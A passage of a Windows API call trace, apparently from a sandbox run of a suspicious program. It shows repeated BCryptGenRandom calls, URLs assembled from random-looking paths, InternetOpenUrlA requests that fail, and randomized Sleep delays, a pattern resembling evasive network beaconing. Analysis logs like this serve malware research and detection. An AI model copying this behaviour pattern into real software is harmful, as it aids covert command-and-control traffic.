returned 0x7ffc5bcc36b0 [0182.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.896] GetProcessHeap () returned 0x440000 [0182.896] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0182.897] lstrcpyA (in: lpString1=0x473350, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0182.897] lstrcatA (in: lpString1="P²¡\x03", lpString2="/dqRaae6qknvw5vy7nhZ/vOc2csZo8n6dtjzaejejfG3phdktnfud7viphvqpa/" | out: lpString1="P²¡\x03/dqRaae6qknvw5vy7nhZ/vOc2csZo8n6dtjzaejejfG3phdktnfud7viphvqpa/") returned="P²¡\x03/dqRaae6qknvw5vy7nhZ/vOc2csZo8n6dtjzaejejfG3phdktnfud7viphvqpa/" [0182.897] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0182.897] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/dqRaae6qknvw5vy7nhZ/vOc2csZo8n6dtjzaejejfG3phdktnfud7viphvqpa/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0182.897] GetProcessHeap () returned 0x440000 [0182.897] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0182.897] GetProcessHeap () returned 0x440000 [0182.897] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0182.897] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0182.898] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0182.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0182.898] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0182.898] Sleep (dwMilliseconds=0x15210) [0183.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0183.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0183.148] GetProcessHeap () returned 0x440000 [0183.148] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0183.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0183.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0183.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0183.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0183.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b266, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a1b266) returned 0x0 [0183.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.398] GetProcessHeap () returned 0x440000 [0183.398] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0183.398] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0183.398] lstrcatA (in: lpString1="\x04", lpString2="/jfc49aFm00jfbIou9eg6/atobKaba0r7ypomdmsau7v9s1hmwp9egBrR/" | out: lpString1="\x04/jfc49aFm00jfbIou9eg6/atobKaba0r7ypomdmsau7v9s1hmwp9egBrR/") returned="\x04/jfc49aFm00jfbIou9eg6/atobKaba0r7ypomdmsau7v9s1hmwp9egBrR/" [0183.398] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0183.399] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/jfc49aFm00jfbIou9eg6/atobKaba0r7ypomdmsau7v9s1hmwp9egBrR/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0183.399] GetProcessHeap () returned 0x440000 [0183.399] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0183.399] GetProcessHeap () returned 0x440000 [0183.399] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0183.399] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0183.399] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0183.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0183.400] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0183.400] Sleep (dwMilliseconds=0x19642) [0183.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0183.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0183.591] GetProcessHeap () returned 0x440000 [0183.591] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5870 [0183.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0183.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5871, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x4f5871) returned 0x0 [0183.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 